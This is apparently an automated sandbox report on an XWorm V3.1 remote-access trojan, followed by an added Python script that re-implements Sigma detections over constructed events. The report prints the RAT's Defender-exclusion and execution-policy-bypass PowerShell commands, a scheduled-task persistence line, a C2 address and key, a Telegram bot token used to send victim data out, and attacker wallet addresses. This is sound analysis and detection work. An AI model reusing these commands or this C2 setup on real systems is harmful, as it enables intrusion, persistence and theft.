
Windows Analysis Report
X1.exe

Overview

General Information

Sample name:X1.exe
Analysis ID:1430689
MD5:2ab2f26ab78dbd53cea3b71c00d568c2
SHA1:53f0a2fdde2f1fe6e1ad44b87b8325624cdeb3fa
SHA256:1f204b43acfdf5d1088f37b2159d98d5500bdaeec99cd3f0d6e8ceb77282351b
Tags:exe

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • X1.exe (PID: 3664 cmdline: "C:\Users\user\Desktop\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
    • powershell.exe (PID: 4320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5004 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • X1.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • X1.exe (PID: 940 cmdline: "C:\Users\user\AppData\Roaming\X1.exe" MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • X1.exe (PID: 5860 cmdline: C:\Users\user\AppData\Roaming\X1.exe MD5: 2AB2F26AB78DBD53CEA3B71C00D568C2)
  • cleanup

Malware Configuration

{"C2 url": ["91.92.252.220"], "Port": "4442", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672", "Version": "XWorm V3.1"}

Yara Overview

Source: X1.exe (submitted sample)
  • JoeSecurity_XWorm: Yara detected XWorm (Joe Security)
  • JoeSecurity_GenericDownloader_1: Yara detected Generic Downloader (Joe Security)
  • JoeSecurity_TelegramRAT: Yara detected Telegram RAT (Joe Security)
  • MALWARE_Win_AsyncRAT: Detects AsyncRAT (ditekSHen), matched strings:
    • 0x96b8:$s6: VirtualBox
    • 0x9616:$s8: Win32_ComputerSystem
    • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9b96:$cnc4: POST / HTTP/1.1

Source: C:\Users\user\AppData\Roaming\X1.exe (dropped copy; same MD5 as the submitted sample)
  • JoeSecurity_XWorm: Yara detected XWorm (Joe Security)
  • JoeSecurity_GenericDownloader_1: Yara detected Generic Downloader (Joe Security)
  • JoeSecurity_TelegramRAT: Yara detected Telegram RAT (Joe Security)
  • MALWARE_Win_AsyncRAT: Detects AsyncRAT (ditekSHen), matched strings:
    • 0x96b8:$s6: VirtualBox
    • 0x9616:$s8: Win32_ComputerSystem
    • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9b96:$cnc4: POST / HTTP/1.1

Source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp (memory dump)
  • JoeSecurity_XWorm: Yara detected XWorm (Joe Security)
  • JoeSecurity_TelegramRAT: Yara detected Telegram RAT (Joe Security)

Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp (memory dump)
  • JoeSecurity_XWorm: Yara detected XWorm (Joe Security)
  • JoeSecurity_TelegramRAT: Yara detected Telegram RAT (Joe Security)
  • MALWARE_Win_AsyncRAT: Detects AsyncRAT (ditekSHen), matched strings:
    • 0x94b8:$s6: VirtualBox
    • 0x9416:$s8: Win32_ComputerSystem
    • 0xa15a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xa1f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xa30c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9996:$cnc4: POST / HTTP/1.1
  (3 further memory-dump matches are not included in this export.)

Source: 0.0.X1.exe.c50000.0.unpack (unpacked PE)
  • JoeSecurity_XWorm: Yara detected XWorm (Joe Security)
  • JoeSecurity_GenericDownloader_1: Yara detected Generic Downloader (Joe Security)
  • JoeSecurity_TelegramRAT: Yara detected Telegram RAT (Joe Security)
  • MALWARE_Win_AsyncRAT: Detects AsyncRAT (ditekSHen), matched strings:
    • 0x96b8:$s6: VirtualBox
    • 0x9616:$s8: Win32_ComputerSystem
    • 0xa35a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xa3f7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xa50c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9b96:$cnc4: POST / HTTP/1.1

Note on the AsyncRAT match: the MALWARE_Win_AsyncRAT rule fires on generic strings (VM-detection strings such as VirtualBox and Win32_ComputerSystem, browser User-Agent strings and a bare POST request line) that XWorm shares; the family-specific rules and the extracted configuration identify the sample as XWorm V3.1.

                            System Summary

Sigma matches:
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\X1.exe, ProcessId: 3664, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe", ProcessId: 5004, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X1.exe", ParentImage: C:\Users\user\Desktop\X1.exe, ParentProcessId: 3664, ParentProcessName: X1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe', ProcessId: 4320, ProcessName: powershell.exe
Snort IDS alerts:
Timestamp: 04/24/24-02:56:33.471440 | SID: 2852874 | Source Port: 4442 | Destination Port: 49714 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/24/24-02:56:33.471440 | SID: 2852870 | Source Port: 4442 | Destination Port: 49714 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/24/24-02:55:52.480977 | SID: 2855924 | Source Port: 49714 | Destination Port: 4442 | Protocol: TCP | Classtype: A Network Trojan was detected
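The Sigma matches above are the host-side detection story for this sample: an execution-policy bypass, two Defender exclusions, a scheduled task that re-launches the dropped copy every minute from %AppData%, and a .lnk written to the Startup folder. The script below is an added example and is not code from the Joe Sandbox report or the Sigma project: it re-implements those checks in simplified form and runs them over constructed process- and file-creation events copied from the report's process tree, plus benign decoys (PIDs 7001 and 7002, with assumed command lines) and a constructed `-EncodedCommand` variant (PID 7003) of the same exclusion, the form the "Base64 Encoded MpPreference Cmdlet" rule exists to catch.

```python
"""Added example, not part of the Joe Sandbox report: simplified re-implementation of the
Sigma-style detections that fired on this sample, run over constructed events. The matching
logic is an approximation written for this page, not the Sigma project's rule text."""
import base64
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"

# Folder fragments marking a task action in user-writable profile or temp space. The Sigma
# rule keys on %AppData%-style variables; expanded forms are added because the sandbox logged
# the already-expanded path.
SUSPICIOUS_TASK_DIRS = ("%appdata%", "%localappdata%", "%temp%", "%programdata%",
                        "\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\",
                        "\\programdata\\")

# Constructed decoy: the same Defender exclusion hidden behind -EncodedCommand (UTF-16LE Base64).
ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\Tools'".encode("utf-16le")).decode()

# Constructed events: the first four mirror PIDs 4320, 4304, 5004 and the Sysmon EventID 11 from
# PID 3664 in the report; 7001/7002 are benign decoys (assumed command lines); 7003 is the
# encoded variant above.
EVENTS = [
    {"type": "process", "pid": 4320, "image": PS,
     "cmdline": f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
                r"'C:\Users\user\Desktop\X1.exe'"},
    {"type": "process", "pid": 4304, "image": PS,
     "cmdline": f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' "'X1.exe'"},
    {"type": "process", "pid": 5004, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" '
                r'/tr "C:\Users\user\AppData\Roaming\X1.exe"'},
    {"type": "file", "pid": 3664, "image": r"C:\Users\user\Desktop\X1.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk"},
    {"type": "process", "pid": 7001, "image": PS,
     "cmdline": f'"{PS}" -NoProfile -Command Get-MpComputerStatus'},
    {"type": "process", "pid": 7002, "image": SCHTASKS,
     "cmdline": f'"{SCHTASKS}" /create /tn "NightlyBackup" /sc daily /st 02:00 '
                r'/tr "C:\Program Files\Acme\backup.exe"'},
    {"type": "process", "pid": 7003, "image": PS,
     "cmdline": f'"{PS}" -NoProfile -EncodedCommand {ENCODED}'},
]


def _cmd(ev):
    """Command line of a process event plus the decoded text of any -e/-enc/-EncodedCommand blob."""
    if ev["type"] != "process":
        return ""
    cl = ev["cmdline"]
    for blob in re.findall(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", cl, re.I):
        try:
            cl += " " + base64.b64decode(blob).decode("utf-16le", "ignore")
        except ValueError:
            pass  # not Base64 after all; keep the raw command line
    return cl


def rule_insecure_policy(ev):
    """Change PowerShell Policies to an Insecure Level: -ExecutionPolicy (or -ep/-ex...) Bypass|Unrestricted."""
    return re.search(r"-(?:ep|ex[a-z]*)\s+(?:bypass|unrestricted)\b", _cmd(ev), re.I) is not None


def rule_defender_exclusion(ev):
    """Powershell Defender Exclusion: Add-/Set-MpPreference with an -Exclusion* parameter, plain or encoded."""
    cl = _cmd(ev).lower()
    return ("add-mppreference" in cl or "set-mppreference" in cl) and "-exclusion" in cl


def rule_schtasks_env_var_folder(ev):
    """Suspicious Schtasks From Env Var Folder: schtasks /create whose /tr action lives in a user-writable folder."""
    cl = _cmd(ev)
    if not ev["image"].lower().endswith("schtasks.exe") or not re.search(r"/create\b", cl, re.I):
        return False
    m = re.search(r'/tr\s+"?([^"]+)"?', cl, re.I)
    return bool(m) and any(d in m.group(1).lower() for d in SUSPICIOUS_TASK_DIRS)


def rule_startup_folder_write(ev):
    """Startup Folder File Write: a file created under a Start Menu\\Programs\\Startup folder."""
    return ev["type"] == "file" and "\\start menu\\programs\\startup\\" in ev["target"].lower()


def task_interval_minutes(cmdline):
    """Interval of a '/sc minute [/mo N]' task, else None; a one-minute respawn loop is persistence, not maintenance."""
    m = re.search(r"/sc\s+minute(?:\s+/mo\s+(\d+))?", cmdline, re.I)
    return int(m.group(1) or 1) if m else None


RULES = {
    "Change PowerShell Policies to an Insecure Level": rule_insecure_policy,
    "Powershell Defender Exclusion": rule_defender_exclusion,
    "Suspicious Schtasks From Env Var Folder": rule_schtasks_env_var_folder,
    "Startup Folder File Write": rule_startup_folder_write,
}


def scan(events):
    """Map PID -> names of the rules that fired, for every event that triggered at least one."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits.setdefault(ev["pid"], []).extend(fired)
    return hits


if __name__ == "__main__":
    for pid, names in scan(EVENTS).items():
        print(pid, names)
```

Running it reports PIDs 4320 and 4304 for both PowerShell rules, 5004 for the scheduled task, 3664 for the Startup-folder write and 7003 for the encoded exclusion, and nothing for the two decoys. The one-minute `/sc minute /mo 1` interval is worth a rule of its own in practice: a task that relaunches a binary from a profile folder every minute is a respawn loop, which is exactly why the three X1.exe instances appear in the process tree.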


                            AV Detection

Source: X1.exe | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (this URL is a string in powershell.exe memory belonging to the bundled Pester module, see the Networking section; the sample never contacts it and it is not an indicator for the sample)
Source: C:\Users\user\AppData\Roaming\X1.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: X1.exe | Malware Configuration Extractor: Xworm {"C2 url": ["91.92.252.220"], "Port": "4442", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "explorer.exe", "Telegram URL": "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672", "Version": "XWorm V3.1"}
Source: 91.92.252.220 | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Roaming\X1.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\X1.exe | Virustotal: Detection: 71%
Source: X1.exe | ReversingLabs: Detection: 78%
Source: X1.exe | Virustotal: Detection: 71%
Source: C:\Users\user\AppData\Roaming\X1.exe | Joe Sandbox ML: detected
Source: X1.exe | Joe Sandbox ML: detected
Source: X1.exe | String decryptor: 91.92.252.220 (C2 host)
Source: X1.exe | String decryptor: 4442 (C2 port)
Source: X1.exe | String decryptor: <123456789> (AES key material for the C2 traffic and configuration strings)
Source: X1.exe | String decryptor: <Xwormmm> (SPL, the delimiter between fields in C2 messages)
Source: X1.exe | String decryptor: explorer.exe (install file name from the configuration; in this run the sample was copied as X1.exe)
Source: X1.exe | String decryptor: bc1q7p5qe345uqww9e4ut3nt08tu2lsgnvfsc40azt (Bitcoin bech32 address)
Source: X1.exe | String decryptor: 0x797460dC66e416bead591be98635aaafB836b8e7 (Ethereum address)
Source: X1.exe | String decryptor: TKojtDLFNx6pFPXDuM3QV6FivRUeQzyRWA (Tron address; together with the two addresses above these are attacker wallets, consistent with a clipboard-hijacking (clipper) routine and the clipboard window noted below)
Source: X1.exe | String decryptor: 2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo (Telegram bot token)
Source: X1.exe | String decryptor: 966649672 (Telegram chat_id)
Source: X1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: X1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

Source: Traffic | Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.252.220:4442 -> 192.168.2.5:49714
Source: Traffic | Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.252.220:4442 -> 192.168.2.5:49714
Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49714 -> 91.92.252.220:4442
Source: Malware configuration extractor | URLs: 91.92.252.220
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: X1.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 91.92.252.220:4442
Source: global traffic | HTTP traffic detected: GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  (URL-decoded message text: "☠ [XWorm V3.1]", "New Clinet : B98DB222DCA51DFE7851", "UserName : user", "OSFullName : Microsoft Windows 10 Pro". The path carries the operator's bot token and the query the chat_id, so the check-in itself discloses the identifiers needed to report the bot; "Clinet" is the RAT's own misspelling.)
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
  (The "hosting" field of ip-api.com reports whether the egress address belongs to a hosting or data-center range; this lookup is the basis of the "Check if machine is in data center or colocation facility" signature, a sandbox-evasion check.)
Source: Joe Sandbox View | IP Address: 208.95.112.1 (ip-api.com)
Source: Joe Sandbox View | IP Address: 149.154.167.220 (api.telegram.org)
Source: Joe Sandbox View | ASN Name: THEZONEBG
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 91.92.252.220 (18 connections; the C2 address is hard-coded in the configuration, so no lookup precedes it)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: X1.exe, X1.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: X1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: X1.exe, X1.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
  (The nuget.org, pesterbdd.com, schemas.xmlsoap.org, apache.org, aka.ms, contoso.com and github.com/Pester strings come from PowerShell, its bundled modules (PackageManagement, Pester) and .NET framework constants, and were found in powershell.exe memory; they are not indicators for this sample. The sample's own URLs are ip-api.com and api.telegram.org, and its C2 is the raw IP 91.92.252.220.)
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
